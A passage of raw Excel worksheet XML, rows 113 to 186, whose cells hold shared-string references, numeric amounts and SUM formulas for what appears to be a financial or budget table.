      <c r="D113" s="13" t="s">
        <v>4492</v>
      </c>
      <c r="E113" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F113" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="114" spans="1:6">
      <c r="A114" s="10" t="s">
        <v>4493</v>
      </c>
      <c r="B114" s="16" t="s">
        <v>2692</v>
      </c>
      <c r="C114" s="17">
        <v>0</v>
      </c>
      <c r="D114" s="13" t="s">
        <v>4494</v>
      </c>
      <c r="E114" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F114" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="115" spans="1:6">
      <c r="A115" s="10" t="s">
        <v>4495</v>
      </c>
      <c r="B115" s="16" t="s">
        <v>2693</v>
      </c>
      <c r="C115" s="17">
        <v>0</v>
      </c>
      <c r="D115" s="13" t="s">
        <v>4496</v>
      </c>
      <c r="E115" s="16" t="s">
        <v>2694</v>
      </c>
      <c r="F115" s="17">
        <v>43</v>
      </c>
    </row>
    <row r="116" spans="1:6">
      <c r="A116" s="10" t="s">
        <v>4497</v>
      </c>
      <c r="B116" s="16" t="s">
        <v>2695</v>
      </c>
      <c r="C116" s="17">
        <v>0</v>
      </c>
      <c r="D116" s="13" t="s">
        <v>4498</v>
      </c>
      <c r="E116" s="16" t="s">
        <v>2696</v>
      </c>
      <c r="F116" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="117" spans="1:6">
      <c r="A117" s="10" t="s">
        <v>4499</v>
      </c>
      <c r="B117" s="11" t="s">
        <v>2697</v>
      </c>
      <c r="C117" s="17">
        <v>5109</v>
      </c>
      <c r="D117" s="13" t="s">
        <v>4500</v>
      </c>
      <c r="E117" s="16" t="s">
        <v>2698</v>
      </c>
      <c r="F117" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="118" spans="1:6">
      <c r="A118" s="10" t="s">
        <v>4501</v>
      </c>
      <c r="B118" s="11" t="s">
        <v>2699</v>
      </c>
      <c r="C118" s="17">
        <v>1768</v>
      </c>
      <c r="D118" s="13" t="s">
        <v>4502</v>
      </c>
      <c r="E118" s="16" t="s">
        <v>2700</v>
      </c>
      <c r="F118" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="119" spans="1:6">
      <c r="A119" s="10" t="s">
        <v>4503</v>
      </c>
      <c r="B119" s="16" t="s">
        <v>2701</v>
      </c>
      <c r="C119" s="17">
        <v>0</v>
      </c>
      <c r="D119" s="13" t="s">
        <v>4504</v>
      </c>
      <c r="E119" s="16" t="s">
        <v>2702</v>
      </c>
      <c r="F119" s="17">
        <v>688</v>
      </c>
    </row>
    <row r="120" spans="1:6">
      <c r="A120" s="10" t="s">
        <v>4505</v>
      </c>
      <c r="B120" s="11" t="s">
        <v>2703</v>
      </c>
      <c r="C120" s="17">
        <v>3568</v>
      </c>
      <c r="D120" s="13" t="s">
        <v>4506</v>
      </c>
      <c r="E120" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F120" s="17">
        <v>198</v>
      </c>
    </row>
    <row r="121" spans="1:6">
      <c r="A121" s="10" t="s">
        <v>4507</v>
      </c>
      <c r="B121" s="11" t="s">
        <v>2704</v>
      </c>
      <c r="C121" s="17">
        <v>3043</v>
      </c>
      <c r="D121" s="13" t="s">
        <v>4508</v>
      </c>
      <c r="E121" s="16" t="s">
        <v>2705</v>
      </c>
      <c r="F121" s="17">
        <v>323</v>
      </c>
    </row>
    <row r="122" spans="1:6">
      <c r="A122" s="10" t="s">
        <v>4509</v>
      </c>
      <c r="B122" s="11" t="s">
        <v>2706</v>
      </c>
      <c r="C122" s="17">
        <v>1811</v>
      </c>
      <c r="D122" s="13" t="s">
        <v>4510</v>
      </c>
      <c r="E122" s="11" t="s">
        <v>2707</v>
      </c>
      <c r="F122" s="12">
        <f>SUM(F123:F133)</f>
        <v>0</v>
      </c>
    </row>
    <row r="123" spans="1:6">
      <c r="A123" s="10" t="s">
        <v>4511</v>
      </c>
      <c r="B123" s="11" t="s">
        <v>2708</v>
      </c>
      <c r="C123" s="17">
        <v>0</v>
      </c>
      <c r="D123" s="13" t="s">
        <v>4512</v>
      </c>
      <c r="E123" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F123" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="124" spans="1:6">
      <c r="A124" s="10" t="s">
        <v>4513</v>
      </c>
      <c r="B124" s="11" t="s">
        <v>2709</v>
      </c>
      <c r="C124" s="17">
        <v>0</v>
      </c>
      <c r="D124" s="13" t="s">
        <v>4514</v>
      </c>
      <c r="E124" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F124" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="125" spans="1:6">
      <c r="A125" s="10" t="s">
        <v>4515</v>
      </c>
      <c r="B125" s="11" t="s">
        <v>2710</v>
      </c>
      <c r="C125" s="17">
        <v>0</v>
      </c>
      <c r="D125" s="13" t="s">
        <v>4516</v>
      </c>
      <c r="E125" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F125" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="126" spans="1:6">
      <c r="A126" s="10" t="s">
        <v>4517</v>
      </c>
      <c r="B126" s="11" t="s">
        <v>2711</v>
      </c>
      <c r="C126" s="17">
        <v>1096</v>
      </c>
      <c r="D126" s="13" t="s">
        <v>4518</v>
      </c>
      <c r="E126" s="16" t="s">
        <v>2712</v>
      </c>
      <c r="F126" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="127" spans="1:6">
      <c r="A127" s="10" t="s">
        <v>4519</v>
      </c>
      <c r="B127" s="11" t="s">
        <v>2713</v>
      </c>
      <c r="C127" s="17">
        <v>12295</v>
      </c>
      <c r="D127" s="13" t="s">
        <v>4520</v>
      </c>
      <c r="E127" s="16" t="s">
        <v>2714</v>
      </c>
      <c r="F127" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="128" spans="1:6">
      <c r="A128" s="10" t="s">
        <v>4521</v>
      </c>
      <c r="B128" s="11" t="s">
        <v>2715</v>
      </c>
      <c r="C128" s="17">
        <v>292</v>
      </c>
      <c r="D128" s="13" t="s">
        <v>4522</v>
      </c>
      <c r="E128" s="16" t="s">
        <v>2716</v>
      </c>
      <c r="F128" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="129" spans="1:6">
      <c r="A129" s="10" t="s">
        <v>4523</v>
      </c>
      <c r="B129" s="11" t="s">
        <v>2717</v>
      </c>
      <c r="C129" s="17">
        <v>340</v>
      </c>
      <c r="D129" s="13" t="s">
        <v>4524</v>
      </c>
      <c r="E129" s="16" t="s">
        <v>2718</v>
      </c>
      <c r="F129" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="130" spans="1:6">
      <c r="A130" s="10" t="s">
        <v>4525</v>
      </c>
      <c r="B130" s="11" t="s">
        <v>2719</v>
      </c>
      <c r="C130" s="17">
        <v>19</v>
      </c>
      <c r="D130" s="13" t="s">
        <v>4526</v>
      </c>
      <c r="E130" s="16" t="s">
        <v>2720</v>
      </c>
      <c r="F130" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="131" spans="1:6">
      <c r="A131" s="10" t="s">
        <v>4527</v>
      </c>
      <c r="B131" s="11" t="s">
        <v>2721</v>
      </c>
      <c r="C131" s="12">
        <f>C132+C155+C210+C239+C258+C296+C299+C305</f>
        <v>58141</v>
      </c>
      <c r="D131" s="13" t="s">
        <v>4528</v>
      </c>
      <c r="E131" s="16" t="s">
        <v>2722</v>
      </c>
      <c r="F131" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="132" spans="1:6">
      <c r="A132" s="10" t="s">
        <v>4529</v>
      </c>
      <c r="B132" s="11" t="s">
        <v>2723</v>
      </c>
      <c r="C132" s="12">
        <f>SUM(C133,C140:C152)</f>
        <v>8857</v>
      </c>
      <c r="D132" s="13" t="s">
        <v>4530</v>
      </c>
      <c r="E132" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F132" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="133" spans="1:6">
      <c r="A133" s="10" t="s">
        <v>4531</v>
      </c>
      <c r="B133" s="16" t="s">
        <v>2724</v>
      </c>
      <c r="C133" s="12">
        <f>SUM(C134:C137,C139)</f>
        <v>4851</v>
      </c>
      <c r="D133" s="13" t="s">
        <v>4532</v>
      </c>
      <c r="E133" s="16" t="s">
        <v>2725</v>
      </c>
      <c r="F133" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="134" spans="1:6">
      <c r="A134" s="10" t="s">
        <v>4533</v>
      </c>
      <c r="B134" s="16" t="s">
        <v>2726</v>
      </c>
      <c r="C134" s="17">
        <v>4851</v>
      </c>
      <c r="D134" s="13" t="s">
        <v>4534</v>
      </c>
      <c r="E134" s="11" t="s">
        <v>2727</v>
      </c>
      <c r="F134" s="12">
        <f>SUM(F135:F140)</f>
        <v>330</v>
      </c>
    </row>
    <row r="135" spans="1:6">
      <c r="A135" s="10" t="s">
        <v>4535</v>
      </c>
      <c r="B135" s="16" t="s">
        <v>2728</v>
      </c>
      <c r="C135" s="17">
        <v>0</v>
      </c>
      <c r="D135" s="13" t="s">
        <v>4536</v>
      </c>
      <c r="E135" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F135" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="136" spans="1:6">
      <c r="A136" s="10" t="s">
        <v>4537</v>
      </c>
      <c r="B136" s="16" t="s">
        <v>2729</v>
      </c>
      <c r="C136" s="17">
        <v>0</v>
      </c>
      <c r="D136" s="13" t="s">
        <v>4538</v>
      </c>
      <c r="E136" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F136" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="137" spans="1:6">
      <c r="A137" s="10" t="s">
        <v>4539</v>
      </c>
      <c r="B137" s="16" t="s">
        <v>2730</v>
      </c>
      <c r="C137" s="17">
        <v>0</v>
      </c>
      <c r="D137" s="13" t="s">
        <v>4540</v>
      </c>
      <c r="E137" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F137" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="138" spans="1:6">
      <c r="A138" s="10" t="s">
        <v>4541</v>
      </c>
      <c r="B138" s="16" t="s">
        <v>2731</v>
      </c>
      <c r="C138" s="17">
        <v>0</v>
      </c>
      <c r="D138" s="13" t="s">
        <v>4542</v>
      </c>
      <c r="E138" s="16" t="s">
        <v>2732</v>
      </c>
      <c r="F138" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="139" spans="1:6">
      <c r="A139" s="10" t="s">
        <v>4543</v>
      </c>
      <c r="B139" s="16" t="s">
        <v>2733</v>
      </c>
      <c r="C139" s="17">
        <v>0</v>
      </c>
      <c r="D139" s="13" t="s">
        <v>4544</v>
      </c>
      <c r="E139" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F139" s="17">
        <v>224</v>
      </c>
    </row>
    <row r="140" spans="1:6">
      <c r="A140" s="10" t="s">
        <v>4545</v>
      </c>
      <c r="B140" s="16" t="s">
        <v>2734</v>
      </c>
      <c r="C140" s="17">
        <v>0</v>
      </c>
      <c r="D140" s="13" t="s">
        <v>4546</v>
      </c>
      <c r="E140" s="16" t="s">
        <v>2735</v>
      </c>
      <c r="F140" s="17">
        <v>106</v>
      </c>
    </row>
    <row r="141" spans="1:6">
      <c r="A141" s="10" t="s">
        <v>4547</v>
      </c>
      <c r="B141" s="16" t="s">
        <v>2736</v>
      </c>
      <c r="C141" s="17">
        <v>0</v>
      </c>
      <c r="D141" s="13" t="s">
        <v>4548</v>
      </c>
      <c r="E141" s="11" t="s">
        <v>2737</v>
      </c>
      <c r="F141" s="12">
        <f>SUM(F142:F148)</f>
        <v>0</v>
      </c>
    </row>
    <row r="142" spans="1:6">
      <c r="A142" s="10" t="s">
        <v>4549</v>
      </c>
      <c r="B142" s="16" t="s">
        <v>2738</v>
      </c>
      <c r="C142" s="17">
        <v>0</v>
      </c>
      <c r="D142" s="13" t="s">
        <v>4550</v>
      </c>
      <c r="E142" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F142" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="143" spans="1:6">
      <c r="A143" s="10" t="s">
        <v>4551</v>
      </c>
      <c r="B143" s="16" t="s">
        <v>2739</v>
      </c>
      <c r="C143" s="17">
        <v>3241</v>
      </c>
      <c r="D143" s="13" t="s">
        <v>4552</v>
      </c>
      <c r="E143" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F143" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="144" spans="1:6">
      <c r="A144" s="10" t="s">
        <v>4553</v>
      </c>
      <c r="B144" s="16" t="s">
        <v>2740</v>
      </c>
      <c r="C144" s="17">
        <v>0</v>
      </c>
      <c r="D144" s="13" t="s">
        <v>4554</v>
      </c>
      <c r="E144" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F144" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="145" spans="1:6">
      <c r="A145" s="10" t="s">
        <v>4555</v>
      </c>
      <c r="B145" s="16" t="s">
        <v>2741</v>
      </c>
      <c r="C145" s="17">
        <v>284</v>
      </c>
      <c r="D145" s="13" t="s">
        <v>4556</v>
      </c>
      <c r="E145" s="16" t="s">
        <v>2742</v>
      </c>
      <c r="F145" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="146" spans="1:6">
      <c r="A146" s="10" t="s">
        <v>4557</v>
      </c>
      <c r="B146" s="16" t="s">
        <v>2743</v>
      </c>
      <c r="C146" s="17">
        <v>0</v>
      </c>
      <c r="D146" s="13" t="s">
        <v>4558</v>
      </c>
      <c r="E146" s="16" t="s">
        <v>2744</v>
      </c>
      <c r="F146" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="147" spans="1:6">
      <c r="A147" s="10" t="s">
        <v>4559</v>
      </c>
      <c r="B147" s="16" t="s">
        <v>2745</v>
      </c>
      <c r="C147" s="17">
        <v>0</v>
      </c>
      <c r="D147" s="13" t="s">
        <v>4560</v>
      </c>
      <c r="E147" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F147" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="148" spans="1:6">
      <c r="A148" s="10" t="s">
        <v>4561</v>
      </c>
      <c r="B148" s="16" t="s">
        <v>2746</v>
      </c>
      <c r="C148" s="17">
        <v>369</v>
      </c>
      <c r="D148" s="13" t="s">
        <v>4562</v>
      </c>
      <c r="E148" s="16" t="s">
        <v>2747</v>
      </c>
      <c r="F148" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="149" spans="1:6">
      <c r="A149" s="10" t="s">
        <v>4563</v>
      </c>
      <c r="B149" s="16" t="s">
        <v>2748</v>
      </c>
      <c r="C149" s="17">
        <v>112</v>
      </c>
      <c r="D149" s="13" t="s">
        <v>4564</v>
      </c>
      <c r="E149" s="11" t="s">
        <v>2749</v>
      </c>
      <c r="F149" s="12">
        <f>SUM(F150:F154)</f>
        <v>437</v>
      </c>
    </row>
    <row r="150" spans="1:6">
      <c r="A150" s="10" t="s">
        <v>4565</v>
      </c>
      <c r="B150" s="16" t="s">
        <v>2750</v>
      </c>
      <c r="C150" s="17">
        <v>0</v>
      </c>
      <c r="D150" s="13" t="s">
        <v>4566</v>
      </c>
      <c r="E150" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F150" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="151" spans="1:6">
      <c r="A151" s="10" t="s">
        <v>4567</v>
      </c>
      <c r="B151" s="16" t="s">
        <v>2751</v>
      </c>
      <c r="C151" s="17">
        <v>0</v>
      </c>
      <c r="D151" s="13" t="s">
        <v>4568</v>
      </c>
      <c r="E151" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F151" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="152" spans="1:6">
      <c r="A152" s="10" t="s">
        <v>4569</v>
      </c>
      <c r="B152" s="16" t="s">
        <v>2752</v>
      </c>
      <c r="C152" s="12">
        <f>C153+C154</f>
        <v>0</v>
      </c>
      <c r="D152" s="13" t="s">
        <v>4570</v>
      </c>
      <c r="E152" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F152" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="153" spans="1:6">
      <c r="A153" s="10" t="s">
        <v>4571</v>
      </c>
      <c r="B153" s="16" t="s">
        <v>2753</v>
      </c>
      <c r="C153" s="17">
        <v>0</v>
      </c>
      <c r="D153" s="13" t="s">
        <v>4572</v>
      </c>
      <c r="E153" s="16" t="s">
        <v>2754</v>
      </c>
      <c r="F153" s="17">
        <v>413</v>
      </c>
    </row>
    <row r="154" spans="1:6">
      <c r="A154" s="10" t="s">
        <v>4573</v>
      </c>
      <c r="B154" s="16" t="s">
        <v>2755</v>
      </c>
      <c r="C154" s="17">
        <v>0</v>
      </c>
      <c r="D154" s="13" t="s">
        <v>4574</v>
      </c>
      <c r="E154" s="16" t="s">
        <v>2756</v>
      </c>
      <c r="F154" s="17">
        <v>24</v>
      </c>
    </row>
    <row r="155" spans="1:6">
      <c r="A155" s="10" t="s">
        <v>4575</v>
      </c>
      <c r="B155" s="11" t="s">
        <v>2757</v>
      </c>
      <c r="C155" s="12">
        <f>SUM(C156:C181,C183,C184,C186:C188,C190,C192,C193,C195,C197:C209)</f>
        <v>9335</v>
      </c>
      <c r="D155" s="13" t="s">
        <v>4576</v>
      </c>
      <c r="E155" s="11" t="s">
        <v>2758</v>
      </c>
      <c r="F155" s="12">
        <f>SUM(F156:F161)</f>
        <v>2</v>
      </c>
    </row>
    <row r="156" spans="1:6">
      <c r="A156" s="10" t="s">
        <v>4577</v>
      </c>
      <c r="B156" s="16" t="s">
        <v>2759</v>
      </c>
      <c r="C156" s="17">
        <v>0</v>
      </c>
      <c r="D156" s="13" t="s">
        <v>4578</v>
      </c>
      <c r="E156" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F156" s="17">
        <v>2</v>
      </c>
    </row>
    <row r="157" spans="1:6">
      <c r="A157" s="10" t="s">
        <v>4579</v>
      </c>
      <c r="B157" s="16" t="s">
        <v>2760</v>
      </c>
      <c r="C157" s="17">
        <v>424</v>
      </c>
      <c r="D157" s="13" t="s">
        <v>4580</v>
      </c>
      <c r="E157" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F157" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="158" spans="1:6">
      <c r="A158" s="10" t="s">
        <v>4581</v>
      </c>
      <c r="B158" s="16" t="s">
        <v>2761</v>
      </c>
      <c r="C158" s="17">
        <v>0</v>
      </c>
      <c r="D158" s="13" t="s">
        <v>4582</v>
      </c>
      <c r="E158" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F158" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="159" spans="1:6">
      <c r="A159" s="10" t="s">
        <v>4583</v>
      </c>
      <c r="B159" s="16" t="s">
        <v>2762</v>
      </c>
      <c r="C159" s="17">
        <v>0</v>
      </c>
      <c r="D159" s="13" t="s">
        <v>4584</v>
      </c>
      <c r="E159" s="16" t="s">
        <v>2552</v>
      </c>
      <c r="F159" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="160" spans="1:6">
      <c r="A160" s="10" t="s">
        <v>4585</v>
      </c>
      <c r="B160" s="16" t="s">
        <v>2763</v>
      </c>
      <c r="C160" s="17">
        <v>0</v>
      </c>
      <c r="D160" s="13" t="s">
        <v>4586</v>
      </c>
      <c r="E160" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F160" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="161" spans="1:6">
      <c r="A161" s="10" t="s">
        <v>4587</v>
      </c>
      <c r="B161" s="16" t="s">
        <v>2764</v>
      </c>
      <c r="C161" s="17">
        <v>0</v>
      </c>
      <c r="D161" s="13" t="s">
        <v>4588</v>
      </c>
      <c r="E161" s="16" t="s">
        <v>2765</v>
      </c>
      <c r="F161" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="162" spans="1:6">
      <c r="A162" s="10" t="s">
        <v>4589</v>
      </c>
      <c r="B162" s="16" t="s">
        <v>2766</v>
      </c>
      <c r="C162" s="17">
        <v>0</v>
      </c>
      <c r="D162" s="13" t="s">
        <v>4590</v>
      </c>
      <c r="E162" s="11" t="s">
        <v>2767</v>
      </c>
      <c r="F162" s="12">
        <f>SUM(F163:F168)</f>
        <v>814</v>
      </c>
    </row>
    <row r="163" spans="1:6">
      <c r="A163" s="10" t="s">
        <v>4591</v>
      </c>
      <c r="B163" s="16" t="s">
        <v>2768</v>
      </c>
      <c r="C163" s="17">
        <v>0</v>
      </c>
      <c r="D163" s="13" t="s">
        <v>4592</v>
      </c>
      <c r="E163" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F163" s="17">
        <v>258</v>
      </c>
    </row>
    <row r="164" spans="1:6">
      <c r="A164" s="10" t="s">
        <v>4593</v>
      </c>
      <c r="B164" s="16" t="s">
        <v>2769</v>
      </c>
      <c r="C164" s="17">
        <v>0</v>
      </c>
      <c r="D164" s="13" t="s">
        <v>4594</v>
      </c>
      <c r="E164" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F164" s="17">
        <v>133</v>
      </c>
    </row>
    <row r="165" spans="1:6">
      <c r="A165" s="10" t="s">
        <v>4595</v>
      </c>
      <c r="B165" s="16" t="s">
        <v>2770</v>
      </c>
      <c r="C165" s="17">
        <v>0</v>
      </c>
      <c r="D165" s="13" t="s">
        <v>4596</v>
      </c>
      <c r="E165" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F165" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="166" spans="1:6">
      <c r="A166" s="10" t="s">
        <v>4597</v>
      </c>
      <c r="B166" s="16" t="s">
        <v>2771</v>
      </c>
      <c r="C166" s="17">
        <v>0</v>
      </c>
      <c r="D166" s="13" t="s">
        <v>4598</v>
      </c>
      <c r="E166" s="16" t="s">
        <v>2772</v>
      </c>
      <c r="F166" s="17">
        <v>346</v>
      </c>
    </row>
    <row r="167" spans="1:6">
      <c r="A167" s="10" t="s">
        <v>4599</v>
      </c>
      <c r="B167" s="16" t="s">
        <v>2773</v>
      </c>
      <c r="C167" s="17">
        <v>0</v>
      </c>
      <c r="D167" s="13" t="s">
        <v>4600</v>
      </c>
      <c r="E167" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F167" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="168" spans="1:6">
      <c r="A168" s="10" t="s">
        <v>4601</v>
      </c>
      <c r="B168" s="16" t="s">
        <v>2774</v>
      </c>
      <c r="C168" s="17">
        <v>0</v>
      </c>
      <c r="D168" s="13" t="s">
        <v>4602</v>
      </c>
      <c r="E168" s="16" t="s">
        <v>2775</v>
      </c>
      <c r="F168" s="17">
        <v>77</v>
      </c>
    </row>
    <row r="169" spans="1:6">
      <c r="A169" s="10" t="s">
        <v>4603</v>
      </c>
      <c r="B169" s="16" t="s">
        <v>2776</v>
      </c>
      <c r="C169" s="17">
        <v>0</v>
      </c>
      <c r="D169" s="13" t="s">
        <v>4604</v>
      </c>
      <c r="E169" s="11" t="s">
        <v>2777</v>
      </c>
      <c r="F169" s="12">
        <f>SUM(F170:F175)</f>
        <v>3248</v>
      </c>
    </row>
    <row r="170" spans="1:6">
      <c r="A170" s="10" t="s">
        <v>4605</v>
      </c>
      <c r="B170" s="16" t="s">
        <v>2778</v>
      </c>
      <c r="C170" s="17">
        <v>0</v>
      </c>
      <c r="D170" s="13" t="s">
        <v>4606</v>
      </c>
      <c r="E170" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F170" s="17">
        <v>2341</v>
      </c>
    </row>
    <row r="171" spans="1:6">
      <c r="A171" s="10" t="s">
        <v>4607</v>
      </c>
      <c r="B171" s="16" t="s">
        <v>2779</v>
      </c>
      <c r="C171" s="17">
        <v>0</v>
      </c>
      <c r="D171" s="13" t="s">
        <v>4608</v>
      </c>
      <c r="E171" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F171" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="172" spans="1:6">
      <c r="A172" s="10" t="s">
        <v>4609</v>
      </c>
      <c r="B172" s="16" t="s">
        <v>2780</v>
      </c>
      <c r="C172" s="17">
        <v>0</v>
      </c>
      <c r="D172" s="13" t="s">
        <v>4610</v>
      </c>
      <c r="E172" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F172" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="173" spans="1:6">
      <c r="A173" s="10" t="s">
        <v>4611</v>
      </c>
      <c r="B173" s="16" t="s">
        <v>2781</v>
      </c>
      <c r="C173" s="17">
        <v>0</v>
      </c>
      <c r="D173" s="13" t="s">
        <v>4612</v>
      </c>
      <c r="E173" s="16" t="s">
        <v>2782</v>
      </c>
      <c r="F173" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="174" spans="1:6">
      <c r="A174" s="10" t="s">
        <v>4613</v>
      </c>
      <c r="B174" s="16" t="s">
        <v>2783</v>
      </c>
      <c r="C174" s="17">
        <v>508</v>
      </c>
      <c r="D174" s="13" t="s">
        <v>4614</v>
      </c>
      <c r="E174" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F174" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="175" spans="1:6">
      <c r="A175" s="10" t="s">
        <v>4615</v>
      </c>
      <c r="B175" s="16" t="s">
        <v>2784</v>
      </c>
      <c r="C175" s="17">
        <v>0</v>
      </c>
      <c r="D175" s="13" t="s">
        <v>4616</v>
      </c>
      <c r="E175" s="16" t="s">
        <v>2785</v>
      </c>
      <c r="F175" s="17">
        <v>907</v>
      </c>
    </row>
    <row r="176" spans="1:6">
      <c r="A176" s="10" t="s">
        <v>4617</v>
      </c>
      <c r="B176" s="16" t="s">
        <v>2786</v>
      </c>
      <c r="C176" s="17">
        <v>0</v>
      </c>
      <c r="D176" s="13" t="s">
        <v>4618</v>
      </c>
      <c r="E176" s="11" t="s">
        <v>2787</v>
      </c>
      <c r="F176" s="12">
        <f>SUM(F177:F182)</f>
        <v>1198</v>
      </c>
    </row>
    <row r="177" spans="1:6">
      <c r="A177" s="10" t="s">
        <v>4619</v>
      </c>
      <c r="B177" s="16" t="s">
        <v>2788</v>
      </c>
      <c r="C177" s="17">
        <v>2606</v>
      </c>
      <c r="D177" s="13" t="s">
        <v>4620</v>
      </c>
      <c r="E177" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F177" s="17">
        <v>794</v>
      </c>
    </row>
    <row r="178" spans="1:6">
      <c r="A178" s="10" t="s">
        <v>4621</v>
      </c>
      <c r="B178" s="16" t="s">
        <v>2789</v>
      </c>
      <c r="C178" s="17">
        <v>0</v>
      </c>
      <c r="D178" s="13" t="s">
        <v>4622</v>
      </c>
      <c r="E178" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F178" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="179" spans="1:6">
      <c r="A179" s="10" t="s">
        <v>4623</v>
      </c>
      <c r="B179" s="16" t="s">
        <v>2790</v>
      </c>
      <c r="C179" s="17">
        <v>0</v>
      </c>
      <c r="D179" s="13" t="s">
        <v>4624</v>
      </c>
      <c r="E179" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F179" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="180" spans="1:6">
      <c r="A180" s="10" t="s">
        <v>4625</v>
      </c>
      <c r="B180" s="16" t="s">
        <v>2791</v>
      </c>
      <c r="C180" s="17">
        <v>0</v>
      </c>
      <c r="D180" s="13" t="s">
        <v>4626</v>
      </c>
      <c r="E180" s="16" t="s">
        <v>2792</v>
      </c>
      <c r="F180" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="181" spans="1:6">
      <c r="A181" s="10" t="s">
        <v>4627</v>
      </c>
      <c r="B181" s="16" t="s">
        <v>2793</v>
      </c>
      <c r="C181" s="17">
        <v>4939</v>
      </c>
      <c r="D181" s="13" t="s">
        <v>4628</v>
      </c>
      <c r="E181" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F181" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="182" spans="1:6">
      <c r="A182" s="10" t="s">
        <v>4629</v>
      </c>
      <c r="B182" s="16" t="s">
        <v>2794</v>
      </c>
      <c r="C182" s="17">
        <v>4923</v>
      </c>
      <c r="D182" s="13" t="s">
        <v>4630</v>
      </c>
      <c r="E182" s="16" t="s">
        <v>2795</v>
      </c>
      <c r="F182" s="17">
        <v>404</v>
      </c>
    </row>
    <row r="183" spans="1:6">
      <c r="A183" s="10" t="s">
        <v>4631</v>
      </c>
      <c r="B183" s="16" t="s">
        <v>2796</v>
      </c>
      <c r="C183" s="17">
        <v>0</v>
      </c>
      <c r="D183" s="13" t="s">
        <v>4632</v>
      </c>
      <c r="E183" s="11" t="s">
        <v>2797</v>
      </c>
      <c r="F183" s="12">
        <f>SUM(F184:F189)</f>
        <v>747</v>
      </c>
    </row>
    <row r="184" spans="1:6">
      <c r="A184" s="10" t="s">
        <v>4633</v>
      </c>
      <c r="B184" s="16" t="s">
        <v>2798</v>
      </c>
      <c r="C184" s="17">
        <v>0</v>
      </c>
      <c r="D184" s="13" t="s">
        <v>4634</v>
      </c>
      <c r="E184" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F184" s="17">
        <v>427</v>
      </c>
    </row>
    <row r="185" spans="1:6">
      <c r="A185" s="10" t="s">
        <v>4635</v>
      </c>
      <c r="B185" s="16" t="s">
        <v>2799</v>
      </c>
      <c r="C185" s="17">
        <v>0</v>
      </c>
      <c r="D185" s="13" t="s">
        <v>4636</v>
      </c>
      <c r="E185" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F185" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="186" spans="1:6">
      <c r="A186" s="10" t="s">
        <v>4637</v>
